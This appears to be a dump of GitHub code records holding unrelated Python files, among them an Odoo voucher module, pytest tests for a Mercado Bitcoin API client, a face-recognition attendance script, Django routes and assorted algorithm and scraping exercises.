self.pool.get('res.company')._company_default_get(\n cr, uid, context=context)\n\n _columns = {\n 'is_margin_scheme': fields.boolean('Margin Scheme'),\n 'identity_document_id': fields.many2one('identity.document',\n string='Identity Document', track_visibility='onchange',\n domain=\"[('partner_id', '=', partner_id)]\"),\n }\n\n _defaults = {\n 'is_margin_scheme': False,\n }\n\n def button_refresh_voucher_lines(self, cr, uid, ids, context=None):\n voucher_line_obj = self.pool.get('account.voucher.line')\n\n for 
voucher in self.browse(cr, uid, ids, context):\n value = self.onchange_partner_id(cr, uid, [voucher.id],\n voucher.partner_id.id, voucher.journal_id.id,\n voucher.amount, voucher.currency_id.id,\n voucher.type, voucher.date, context)['value']\n\n line_ids = [l.id for l in voucher.line_ids]\n if line_ids:\n voucher_line_obj.unlink(cr, uid, line_ids, context)\n\n lines = value.get('line_cr_ids', []) + value.get('line_dr_ids', [])\n for line in lines:\n line['voucher_id'] = voucher.id\n voucher_line_obj.create(cr, uid, line, context)\n\n return {'type': 'ir.actions.act_window_close'}\n\n def proforma_voucher(self, cr, uid, ids, context=None):\n register_obj = self.pool.get('goods.loading.register')\n super(account_voucher, self).proforma_voucher(cr, uid, ids, context)\n register_obj.update_from_receipts(cr, uid, ids, context)\n return True\n\n def on_change_margin_scheme(self, cr, uid, ids, is_margin_scheme, context=None):\n company_id = self._get_company_default(cr, uid, context)\n company = self.pool.get('res.company').browse(cr, uid, company_id, context)\n tax_id = company.margin_account_tax_for_purchase_receipts_id\n value = {\n 'tax_id': tax_id.id if tax_id and is_margin_scheme else None,\n }\n return {'value': value}\n\naccount_voucher()\n\n\nclass account_voucher_line(Model):\n _inherit = 'account.voucher.line'\n\n def _get_lading_register_entry_id(self, cr, uid, ids, name, args,\n context=None):\n res = {}\n entry_obj = self.pool.get('goods.loading.register.line')\n for o in self.browse(cr, uid, ids, context=context):\n entry_ids = entry_obj.search(cr, uid, [\n ('voucher_line_in', '=', o.id),\n ], context=context)\n res[o.id] = entry_ids[0] if len(entry_ids) > 0 else None\n return res\n\n _columns = {\n 'lot_id': fields.many2one('stock.production.lot', string='Lot'),\n 'product_id': fields.related('lot_id', 'product_id', type='many2one',\n relation='product.product', string='Product', readonly=True),\n 'goods_loading_register_entry_id': fields.function(\n _get_lading_register_entry_id, type='many2one',\n obj='goods.loading.register.line',\n string='Goods Loading Register Entry'),\n 'kept_product_id': fields.many2one('kept.product.to.return',\n string='Kept Product To Return', ondelete='restrict'),\n 'is_margin_scheme': fields.related('voucher_id', 'is_margin_scheme',\n type='boolean', string='Margin Scheme', readonly=True),\n }\n\n def on_change_lot_id(self, cr, uid, ids, lot_id, context=None):\n value = {'name': ''}\n if lot_id:\n lot = self.pool.get('stock.production.lot').browse(cr, uid,\n lot_id, context)\n value['name'] = lot.product_id.name_get()[0][1]\n return {'value': value}\n\n def unlink(self, cr, uid, ids, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n k_ids = set()\n for l in self.browse(cr, uid, ids, context):\n if l.kept_product_id:\n k_ids.add(l.kept_product_id.id)\n res = super(account_voucher_line, self).unlink(cr, uid, ids, context)\n self.pool.get('kept.product.to.return').write(cr, uid, list(k_ids), {}, context)\n return res","repo_name":"sergiocorato/margin","sub_path":"techplus_l10n_it_sale/account_voucher.py","file_name":"account_voucher.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22606978339","text":"\"\"\"\nReturn the theoric branch frequency spectrum for a haploid Kingman coalescent\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom compare_theory.bfs_kingman import 
bfs_kingman\n\nKNOWN_ALPHA_VALUES = [1.1, 1.3, 1.5, 1.9, 2]\nKNOWN_SAMPLE_SIZE_VALUES = [10]\n\nBETA_BFS_VALUES = {\n '1.1': [0.580175, 0.119103, 0.066440, 0.047197, 0.038166, 0.033879, 0.032796, 0.035382, 0.046863],\n '1.3': [0.521296, 0.137166, 0.078487, 0.056070, 0.045115, 0.039481, 0.037258, 0.038479, 0.046649],\n '1.5': [0.467491, 0.152216, 0.090245, 0.065103, 0.052216, 0.045067, 0.041436, 0.040898, 0.045330],\n '1.9': [0.374086, 0.173264, 0.112565, 0.083644, 0.066914, 0.056165, 0.048856, 0.043826, 0.040681]}\n\n\ndef bfs_beta(sample_size, alpha, normalized=False):\n \"\"\" Return the theoric branch frequency (bfs) spectrum for a haploid beta coalescent of parameter alpha\n \n Reminder of the definition of the branch frequency spectrum of a coalescent tree:\n bfs is a table of length sample_size-1 where bfs[i] correspond to the total that have exactly (i+1) descendant in the coalescent tree\n\n - sample_size is the number of individuals sampled\n - if normalized then the bfs is normalized (by default the bfs is not normalized)\n - return the bfs as a numpy array of size sample_size-1\n\n /!\\ When beta is true, not all the values of alpha and of sample_size=len(bfs)+1 are accepted.\n - alpha=2 is always accepted\n - else alpha has to be among these: [1.1, 1.3, 1.5, 1.9, 2]\n and sample_size has to be among these: [10]\n \n Don't forget the the beta coalescent of parameter alpha=2 is a Kingman coalescent.\n \n >>> bfs_beta(sample_size=10, alpha=1.3)\n array([0.521296, 0.137166, 0.078487, 0.05607 , 0.045115, 0.039481,\n 0.037258, 0.038479, 0.046649])\n >>> bfs_beta(sample_size=10, alpha=1.7)\n Traceback (most recent call last):\n ...\n Exception: The theoric values of the branch frequency spectrum of a beta coalescent for alpha=1.7 are not stored.\n Please choose a value of alpha among these : [1.1, 1.3, 1.5, 1.9, 2].\n >>> bfs_beta(sample_size=6, alpha=2, normalized=True)\n array([0.8265843 , 0.41329215, 0.2755281 , 0.20664607, 0.16531686])\n \"\"\"\n abscissa = np.arange(1, sample_size)\n\n if alpha == 2:\n # the beta coalescent for alpha=2 is a Kingman coalescent\n beta_bfs = 1 / abscissa\n elif alpha not in KNOWN_ALPHA_VALUES:\n raise Exception(\n f'The theoric values of the branch frequency spectrum of a beta coalescent for alpha={alpha} are not stored.\\nPlease choose a value of alpha among these : {KNOWN_ALPHA_VALUES}.')\n\n elif sample_size not in KNOWN_SAMPLE_SIZE_VALUES:\n raise Exception(\n f'The theoric values of the branch frequency spectrum of a beta coalescent for a sample size {sample_size} are not stored.\\nPlease choose a value of the sample size among these : {KNOWN_SAMPLE_SIZE_VALUES}.')\n\n else:\n beta_bfs = np.array(BETA_BFS_VALUES[f'{alpha}'])\n\n if normalized:\n beta_bfs = beta_bfs / np.linalg.norm(beta_bfs)\n\n return beta_bfs\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"MarieTemple-Boyer/CoalescentTree","sub_path":"compare_theory/bfs_beta.py","file_name":"bfs_beta.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15008736993","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom time import sleep\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom 
selenium.webdriver.support import expected_conditions as EC\n\n\nservice_chrome = Service(r\"C:\\selenium1\\chromedriver.exe\")\n\ndriver = webdriver.Chrome(service=service_chrome)\ndriver.maximize_window()\ndriver.get(\"https://juliemr.github.io/protractor-demo/\")\ndriver.implicitly_wait(10)\n\nnumber_1 = driver.find_element(By.CSS_SELECTOR, \"[ng-model='first']\")\nnumber_2 = driver.find_element(By.CSS_SELECTOR, \"[ng-model='second']\")\naction_math = driver.find_element(By.CSS_SELECTOR, \"[ng-model='operator']\")\ngo_button = driver.find_element(By.ID, \"gobutton\")\n\nnumber_2.send_keys(22)\nnumber_1.send_keys(10)\naction_math_drop_down = Select(action_math)\naction_math_drop_down.select_by_value(\"MULTIPLICATION\")\nsleep(1)\ngo_button.click()\nsleep(1)\n\nresult = driver.find_element(By.CSS_SELECTOR, \"[class='ng-binding']\")\n#while result.text[0]=='.':\n # pass\n#שימוש ב wait לטובת המתנה עד ש...\nwait = WebDriverWait(driver,10)\nwait.until(EC.visibility_of_element_located((By.CSS_SELECTOR,\"td.ng-binding\")))\n\n\n\n\n\nif result.text == '220':\n print('test 1 passed')\nelse:\n print('test 1 faild')\n\n\n","repo_name":"amitlahav1/PycharmProjects","sub_path":"automution_selenium/targil_4.py","file_name":"targil_4.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36547037070","text":"from typing import List, Tuple\n\n\nclass Solution:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n stack: List[int] = []\n result: List[List[int]] = []\n candidates = list(range(1, 10))\n\n def dfs(pos: int, picks_left: int, left: int) -> None:\n if left == 0:\n if picks_left == 0:\n result.append(stack.copy())\n return\n\n if left < 0:\n return\n\n if picks_left == 0:\n return\n\n if pos == len(candidates):\n return\n\n stack.append(candidates[pos])\n dfs(pos + 1, picks_left - 1, left - candidates[pos])\n stack.pop()\n\n dfs(pos + 1, picks_left, left)\n\n dfs(0, k, n)\n\n return result\n\n\nclass Solution1:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n dp = [[False] * (n + 1) for _ in range(k + 1)]\n\n dp[0][0] = True\n\n for step in range(k):\n for num_first in range(n + 1):\n for num_second in range(10):\n if num_first + num_second <= n:\n dp[step + 1][num_first + num_second] = (\n dp[step + 1][num_first + num_second] or dp[step][num_first]\n )\n\n result = []\n\n def dfs(number: int, step: int, path: List[int]) -> None:\n if number < 0:\n return\n\n if step < 0:\n return\n\n if not dp[step][number]:\n return\n\n if number == 0 and step == 0:\n result.append(path.copy())\n\n for next_number in range(path[-1] + 1 if path else 1, min(number + 1, 10)):\n path.append(next_number)\n dfs(number - next_number, step - 1, path)\n path.pop()\n\n dfs(n, k, [])\n\n return result\n\n def combinationSum3TopDown(self, k: int, n: int) -> List[List[int]]:\n def dfs(\n number: int, total: int, steps: int, path: List[int]\n ) -> List[List[int]]:\n if steps > k:\n return []\n\n if total > n:\n return []\n\n if total == n and steps == k:\n return [path.copy()]\n\n if number > 9:\n return []\n\n result = []\n\n path.append(number)\n result += dfs(number + 1, total + number, steps + 1, path)\n path.pop()\n\n result += dfs(number + 1, total, steps, path)\n\n return result\n\n return dfs(1, 0, 0, 
[])\n","repo_name":"fspv/learning","sub_path":"l33tcode/combination-sum-iii.py","file_name":"combination-sum-iii.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"} +{"seq_id":"73823069163","text":"# snntorch\nimport snntorch as snn\nfrom snntorch import surrogate\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# local\nfrom bnn import *\n\n\nclass Net(nn.Module):\n def __init__(self, config):\n super().__init__()\n\n self.thr1 = config['threshold1']\n self.thr2 = config['threshold2']\n slope = config['slope']\n beta = config['beta']\n self.num_steps = config['num_steps']\n p1 = config['dropout1']\n p2 = config['dropout2']\n self.binarize = config['binarize']\n num_hidden = 3000\n spike_grad = surrogate.fast_sigmoid(slope)\n # Initialize layers with spike operator\n \n \n self.bfc1 = BinaryLinear(700, num_hidden)\n self.fc1 = nn.Linear(700, num_hidden)\n self.lif1 = snn.Leaky(beta, threshold=self.thr1, spike_grad=spike_grad)\n self.dropout1 = nn.Dropout(p1)\n \n self.bfc2 = BinaryLinear(num_hidden, 20)\n self.fc2 = nn.Linear(num_hidden, 20)\n self.lif2 = snn.Leaky(beta, threshold=self.thr2, spike_grad=spike_grad)\n self.dropout2 = nn.Dropout(p2)\n\n\n def forward(self, x):\n\n # Initialize hidden states and outputs at t=0\n mem1 = self.lif1.init_leaky() \n mem2 = self.lif2.init_leaky()\n \n # Record the final layer\n spk2_rec = []\n mem2_rec = []\n\n # Binarization\n\n if self.binarize:\n\n for step in range(x.size(0)):\n \n cur1 = self.dropout1(self.bfc1(x[step].flatten(1)))\n spk1, mem1 = self.lif1(cur1, mem1)\n cur2 = self.dropout2(self.bfc2(spk1))\n spk2, mem2 = self.lif2(cur2, mem2)\n\n\n spk2_rec.append(spk2)\n mem2_rec.append(mem2)\n\n return torch.stack(spk2_rec, dim=0), torch.stack(mem2_rec, dim=0)\n \n # Full Precision\n \n else:\n\n for step in range(x.size(0)):\n \n cur1 = self.dropout1(self.fc1(x[step].flatten(1)))\n spk1, mem1 = self.lif1(cur1, mem1)\n cur2 = self.dropout2(self.fc2(spk1))\n spk2, mem2 = self.lif2(cur2, mem2)\n spk2_rec.append(spk2)\n mem2_rec.append(mem2)\n\n return torch.stack(spk2_rec, dim=0), torch.stack(mem2_rec, dim=0)\n\n ","repo_name":"jeshraghian/snn-tha","sub_path":"shd/Net.py","file_name":"Net.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"11683436929","text":"from libcontractvm import Wallet, WalletExplorer, ConsensusManager\nfrom forum import ForumManager\nimport sys\nimport time\nimport os\n\nconsMan = ConsensusManager.ConsensusManager ()\nconsMan.bootstrap (\"http://127.0.0.1:8181\")\n\nwallet = WalletExplorer.WalletExplorer (wallet_file='test.wallet')\nsrMan = ForumManager.ForumManager (consMan, wallet=wallet)\n\nos.system ('clear')\npostid = input('Insert the ID of the post: ')\ntry:\n\tpost = srMan.getPostInfo(postid)\n\tprint ('Title of the post:\\t',post['title'])\n\tprint ('Message of the post:\\t',post['message'])\n\ti=0\t\n\tcomments = post['comments']\n\tif(len(comments)>0):\n\t\tprint(\"Comments:\")\n\t\tfor c in comments.values():\n\t\t\tprint (\"%d)\"% i, c)\n\t\t\ti=i+1\nexcept:\n\tprint('Error')\n\t\n\n","repo_name":"andreasscalas/dappforum","sub_path":"samples/post_info.py","file_name":"post_info.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72605823084","text":"import pandas\n\nfrom .. 
import MarketIndex\n\nclass BCBMarketIndex(MarketIndex):\n # Tabela (dita obsoleta) com o código dos índices:\n # https://www.bcb.gov.br/estatisticas/indecoreestruturacao\n\n series={\n 'CDI': dict(\n url=\"https://api.bcb.gov.br/dados/serie/bcdata.sgs.12/dados?formato=json\",\n home=''\n ),\n 'IPCA': dict(\n # IPCA Serviços. Outros IPCAs: https://dadosabertos.bcb.gov.br/dataset?q=ipca\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.433/dados?formato=json\",\n home = 'https://dadosabertos.bcb.gov.br/dataset/10844-indice-de-precos-ao-consumidor-amplo-ipca---servicos'\n ),\n 'SELIC': dict(\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.11/dados?formato=json\",\n home = 'https://dadosabertos.bcb.gov.br/dataset/11-taxa-de-juros---selic'\n ),\n 'IGPM': dict(\n # url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.4175/dados?formato=json\",\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.189/dados?formato=json\",\n home = 'https://dadosabertos.bcb.gov.br/dataset/4175-divida-mobiliaria---participacao-por-indexador---posicao-em-carteira---igp-m'\n ),\n 'INPC': dict(\n url = \"https://api.bcb.gov.br/dados/serie/bcdata.sgs.188/dados?formato=json\",\n home = ''\n ),\n }\n\n\n\n def __init__(self, name, isRate=True, cache=None, refresh=False):\n if name in self.series:\n s=self.series[name]\n else:\n raise Exception(f'BCBMarketIndex: market index not found: {name}')\n\n super().__init__(kind='BCBMarketIndex', id=name, currency='BRL', isRate=isRate, cache=cache, refresh=refresh)\n\n\n\n @property\n def home(self):\n return self.series[self.id]['home']\n\n\n\n def refreshData(self):\n try:\n self.data=pandas.read_json(self.series[self.id]['url'])\n except BaseException as err:\n self.logger.warning(f\"URL was: {self.series[self.id]['url']}\")\n raise\n\n\n\n def processData(self):\n self.data=(\n self.data\n\n # Create columns\n .assign(\n time=lambda table: (\n (\n # Convert to datetime\n pandas.to_datetime(table.data,dayfirst=True) +\n\n # This is date-only information but we know this is the\n # end of the day\n pandas.Timedelta(hours=22, minutes=59)\n )\n # Set timezone to Brasilia\n .dt\n .tz_localize('Brazil/East')\n\n # Keep it as UTC as module´s internal standard and to\n # improve precision of joins.\n .dt\n .tz_convert('UTC')\n ),\n\n # Convert rate to our standards\n rate=lambda table: table.valor/100,\n\n # Init a column for value\n value=None\n )\n\n # Remove unused\n .drop(columns=['data', 'valor'])\n\n # Time as index\n .set_index('time')\n .sort_index()\n\n # Export only these columns (and time in the index)\n [['rate','value']]\n )\n\n # Now compute value like this:\n #\n # { n=0: 1 + rateₙ\n # valueₙ = {\n # { n≠0: valueₙ₋₁ ✕ (1 + rateₙ)\n #\n\n # At this point we have a dataframe indexed by time with 2 columns:\n # - rate (index 0)\n # - value (index 1, with no data yet)\n\n for n in range(self.data.shape[0]):\n self.data.iat[n,1] = (\n 1+self.data.iat[n,0]\n if n==0\n else self.data.iat[n-1,1]*(1+self.data.iat[n,0])\n )\n","repo_name":"avibrazil/investorzilla","sub_path":"investorzilla/marketindex/brasil_banco_central.py","file_name":"brasil_banco_central.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"29025829269","text":"def pesquisar(nome) :\n if(nome in listaNome) :\n posicao = listaNome.index(nome)\n print(\"------------------------------\")\n print(\"Nome: \", listaNome[posicao], listaSobrenome[posicao])\n print(\"Teefone: 
\",listaFone[posicao])\n print(\"-------------------------\")\n else:\n print(\"-------------------------\")\n print(\"Pessoa não encontrada\")\n print(\"-------------------------\")\n\ndef excluir(nome):\n if(nome in listaNome) :\n posicao = listaNome.index(nome)\n listaNome.pop(posicao)\n listaSobrenome.pop(posicao)\n listaFone.pop(posicao)\n print(\"Exluido com sucesso!\")\n else:\n print(\"-----------------------\")\n print(\"Pessoa não encontrada\")\n print(\"-----------------------\")\n\ndef listar():\n for item in range(0, len(listaNome)):\n print(\"-----------------------\")\n print( \"Nome: \", listaNome[item, listaSobrenome[item]])\n print(\"-----------------------\")\n\nlistaNome = []\nlistaSobrenome = []\nlistaFone = []\nwhile True:\n print(\" 1 - Cadastrar\")\n print(\" 2 - Pesquisar\")\n print(\" 3 - Excluir\")\n print(\" 4 - Listar todos\")\n op = int(input(\"Digide a opção desejada: \"))\n if(op == 1):\n nome = input(\"Informe o Nome: \")\n sobrenome = input(\"Informe o Sobrenome: \")\n fone = input(\"Informe o Telefone: \")\n listaNome.append(nome)\n listaSobrenome.append(sobrenome)\n listaFone.append(fone)\n print(\"-----------------------\")\n print(\"Cadastrado com Sucesso!\")\n print(\"-----------------------\")\n else:\n if(op == 2):\n pesquisa = input(\"Informe o nome a pesquisar: \")\n pesquisar(pesquisa)\n else:\n if(op == 3):\n pesquisa = input(\"Informe o nome a excluir: \")\n excluir(pesquisa)\n else:\n if(op == 4):\n listar()","repo_name":"englernicolas/ADS","sub_path":"python/aula3-extra.py","file_name":"aula3-extra.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38271378099","text":"import unittest\n\nfrom datastructure.bst import BinarySearchTree\n\n\nclass TestBinarySearchTree(unittest.TestCase):\n\n def test_insert(self):\n arr = [10, 1002, 345, 11, 7545, 44, 12612, 232]\n bst = BinarySearchTree()\n for i in arr:\n bst.insert(i)\n\n print(bst.dfs('inorder'))\n\n def test_dfs(self):\n bst = BinarySearchTree()\n for i in [8, 3, 10, 1, 6, 14, 4, 7, 13]:\n bst.insert(i)\n\n print(bst.dfs('inorder'))\n print(bst.dfs('preorder')) # 전위순회하여 결과를 반환\n print(bst.dfs('postorder')) # 후위순회하여 결과를 반환\n print(bst.find(6))\n print(bst.find(15))\n bst.bfs()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"codingbjs/AlgorythmExam","sub_path":"datastructure/tests/TestBst.py","file_name":"TestBst.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29592569231","text":"# Run with:\n# python -m pytest\n\nimport datetime\nimport pytest\nimport requests\n\nfrom mercado_bitcoin.apis import ApiMercadoBitcoin, ApiDaySummary, ApiTrades\nfrom unittest.mock import patch\n\n@pytest.fixture\n@patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin.__abstractmethods__\", set())\ndef fixture_api_mercado_bitcoin():\n return ApiMercadoBitcoin(coin = 'ND')\n\ndef mocked_requests_get(*args, **kwargs):\n class MockResponse(requests.Response):\n def __init__(self, status_code, json_data):\n super().__init__()\n self.status_code = status_code\n self.json_data = json_data\n\n def json(self):\n return self.json_data\n\n def raise_for_status(self):\n if self.status_code != 200:\n raise Exception\n\n if args[0] == 'Response success.':\n return MockResponse(status_code = 200, json_data = {\"foo\": \"bar\"})\n else:\n return MockResponse(status_code = 404, json_data = None)\n\nclass 
TestApiMercadoBitcoin:\n @patch(\"requests.get\")\n @patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin._get_endpoint\", return_value = 'Request done.')\n def test_get_data_request(self, mock_get_endpoint, mock_requests, fixture_api_mercado_bitcoin):\n fixture_api_mercado_bitcoin.get_data()\n\n mock_requests.assert_called_once_with('Request done.')\n\n @patch(\"requests.get\", side_effect = mocked_requests_get)\n @patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin._get_endpoint\", return_value = 'Response success.')\n def test_get_data_response_success(self, mock_get_endpoint, mock_requests, fixture_api_mercado_bitcoin):\n actual = fixture_api_mercado_bitcoin.get_data()\n expected = {\"foo\": \"bar\"}\n\n assert actual == expected\n\n @patch(\"requests.get\", side_effect = mocked_requests_get)\n @patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin._get_endpoint\", return_value = 'Response failure.')\n def test_get_data_response_failure(self, mock_get_endpoint, mock_requests, fixture_api_mercado_bitcoin):\n with pytest.raises(Exception):\n fixture_api_mercado_bitcoin.get_data()\n\nclass TestApiDaySummary:\n @pytest.mark.parametrize(\n \"coin, date, expected\",\n [\n ('BTC', datetime.date(2021, 6, 15), 'https://www.mercadobitcoin.net/api/BTC/day-summary/2021/6/15'),\n ('ETH', datetime.date(2021, 6, 15), 'https://www.mercadobitcoin.net/api/ETH/day-summary/2021/6/15'),\n ('ETH', datetime.date(2021, 6, 30), 'https://www.mercadobitcoin.net/api/ETH/day-summary/2021/6/30')\n ]\n )\n def test_get_endpoint(self, coin, date, expected):\n api = ApiDaySummary(coin = coin)\n actual = api._get_endpoint(date = date)\n \n assert actual == expected\n\nclass TestApiTrades:\n @pytest.mark.parametrize(\n \"day, expected\",\n [\n (datetime.datetime(2021, 1, 25), 1611543600),\n (datetime.datetime(2012, 12, 16), 1355623200),\n (datetime.datetime(2012, 12, 16, 0, 0, 5), 1355623205)\n ]\n )\n def test_get_date_unix(self, day, expected):\n actual = ApiTrades(coin = 'ND')._get_date_unix(day)\n assert actual == expected\n\n @pytest.mark.parametrize(\n \"coin, day, expected\",\n [\n ('ND', datetime.datetime(2021, 1, 25), 'https://www.mercadobitcoin.net/api/ND/trades/1611543600'),\n ('ND', datetime.datetime(2012, 12, 16), 'https://www.mercadobitcoin.net/api/ND/trades/1355623200'),\n ('ND', datetime.datetime(2012, 12, 16, 0, 0, 5), 'https://www.mercadobitcoin.net/api/ND/trades/1355623205')\n ]\n )\n def test_get_endpoint(self, coin, day, expected):\n actual = ApiTrades(coin = coin)._get_endpoint(day = day)\n assert actual == expected\n\n def test_get_endpoint_current_day(self):\n with pytest.raises(RuntimeError):\n ApiTrades(coin = 'ND')._get_endpoint(day = datetime.datetime.today().strftime('%Y-%m-%d'))\n\n","repo_name":"cfascina/hb-data-engineering","sub_path":"exercises/04-data-ingestion/tests/test_apis.py","file_name":"test_apis.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12647648598","text":"from bs4 import BeautifulSoup\r\nimport requests\r\n\r\nresponse = requests.get(\r\n \"https://web.archive.org/web/20200518073855/https://www.empireonline.com/movies/features/best-movies-2/\")\r\nweb_page = response.text\r\n\r\nsoup = BeautifulSoup(web_page, \"html.parser\")\r\nall_movies = soup.find_all(name='h3', class_='title')\r\nall_movies_name = [movie.text for movie in all_movies]\r\nall_movies_name.reverse()\r\n\r\nwith open('movies.txt', 'w', encoding='UTF-8') as file:\r\n for movie in all_movies_name:\r\n 
file.write(f\"{movie} \\n\")\r\n","repo_name":"vanshparate/100-days-of-code","sub_path":"day-45(Scrape)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11469899347","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('specifications/', views.specs, name='specs'),\n path('bleed/', views.bleed, name='bleed'),\n path('file_type/', views.file_type, name='file_type'),\n path('deep_black/', views.deep_black, name='deep_black'),\n path('ink_coverage/', views.ink_coverage, name='ink_coverage'),\n path('job_options/', views.job_options, name='job_options'),\n path('color/', views.color, name='color'),\n path('outlines/', views.outlines, name='outlines'),\n path('foil/', views.foil, name='foil'),\n path('overprint/', views.overprint, name='overprint'),\n path('resolution/', views.resolution, name='resolution'),\n path('templates/', views.templates, name='templates'),\n path('faq/', views.faq, name='faq'),\n path('team/', views.team, name='team'),\n path('printing_house/', views.printing_house, name='printing_house'),\n path('our_concept/', views.our_concept, name='our_concept'),\n]\n","repo_name":"Daph1986/postfly_jouw_online_drukkerij","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7931131889","text":"import cv2\nimport face_recognition as fr\nimport os\nimport numpy\nfrom datetime import datetime\n\n#crear base de datos\nruta = 'Dia_14/Empleados'\nmis_imagenes =[]\nnombres_empleados =[]\nlista_empleados = os.listdir(ruta)\n#elimiar primer registro de una lista\ndel (lista_empleados[0])\n\n\n\n\n#print(lista_empleados)\n\nfor nombre in lista_empleados:\n imagen_actual = cv2.imread(f'{ruta}/{nombre}')\n mis_imagenes.append(imagen_actual)\n nombres_empleados.append(os.path.splitext(nombre)[0])\n\nprint(nombres_empleados)\n\n#codificar imagenes\ndef codificar(imagenes):\n #crear una lista neuva\n lista_codificada=[]\n\n #pasar las imagenes a RGB\n for imagen in imagenes:\n imagen = cv2.cvtColor(imagen, cv2.COLOR_BGR2RGB)\n\n #codificar\n codificado = fr.face_encodings(imagen)[0]\n\n #agregar a la lista\n lista_codificada.append(codificado)\n\n #devollver lista codificada\n return lista_codificada\n\n#registrar los ingresos\ndef registrar_los_ingresos(persona):\n f= open('Dia_14/registro.csv','r+')\n lista_datos =f.readline()\n nombre_registros = []\n for linea in lista_datos:\n ingreso= linea.split(',')\n nombre_registros.append(ingreso[0])\n if persona not in nombre_registros:\n ahora = datetime.now()\n #trasndorma el dato en un string\n string_ahora= ahora.strftime('%H:%M%S')\n f.writelines(f'\\n {persona}, {string_ahora}')\n\nlista_empleados_codificada= codificar(mis_imagenes)\n#print(len(lista_empleados_codificada))\n\n#tomar una imagen de camara web\ncaptura = cv2.VideoCapture(0,cv2.CAP_DSHOW)\n\n\n\n\n\n\n#leer imagen de la camara\nexito, imagen = captura.read()\n\nif not exito:\n print(\"no se pudo tomar la captura\")\nelse:\n #rreconocer cara en caaptura\n cara_captura = fr.face_locations(imagen)\n #codificar cara capturada\n cara_captura_codificada= fr.face_encodings(imagen, cara_captura)\n\n #buscar coincidencias\n for caracodif, caraubic in zip(cara_captura_codificada, cara_captura):\n coincidencia = 
fr.compare_faces(lista_empleados_codificada,caracodif)\n        distancias = fr.face_distance(lista_empleados_codificada,caracodif)\n\n        indice_coincidencia= numpy.argmin(distancias)\n\n        #mostrar coincidencia\n        if distancias[indice_coincidencia]> 0.6:\n            print(\"no coincide con ninguno de nuestros empleados\")\n\n        else:\n            #buscar el nombre del empleado encontrado\n            nombre = nombres_empleados[indice_coincidencia]\n\n            y1,x2,y2,x1 = caraubic\n            cv2.rectangle(imagen, (x1, y1),(x2, y2),(0,255,0),2)\n            cv2.rectangle(imagen, (x1, y2 -35), (x2,y2),(0,255,0),cv2.FILLED)\n            cv2.putText(imagen, nombre, (x1+ 6, y2 -6),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,255),2)\n\n            registrar_los_ingresos(nombre)\n\n    #mostrar la imagen obtenida\n    cv2.imshow('imagen web', imagen)\n\n    #mantener ventana abierta\n    cv2.waitKey(0)\n\n\n\n","repo_name":"sgarciaar/Python-Cero-a-Experto","sub_path":"Dia_14/asistencia.py","file_name":"asistencia.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40526227634","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Johan Stabekk, Sabina Langås'\n__email__ = 'johansta@nmbu.no, sabinal@nmbu.no'\n\n\"\"\"This is a small script that tests if the move_maker function in BioSim simulation works\"\"\"\n\nfrom biosim.simulation import BioSim\n\nDEFAULT_IMAGE_BASE = r'/Users/sabinal/Documents/INF200 JUNI/Bilder og videoer/bio'\n\nsim = BioSim(ymax_animals=2000,\n             cmax_animals={'Herbivore': 150, 'Carnivore': 80},\n             img_base=DEFAULT_IMAGE_BASE)\nsim.simulate(25, 1, 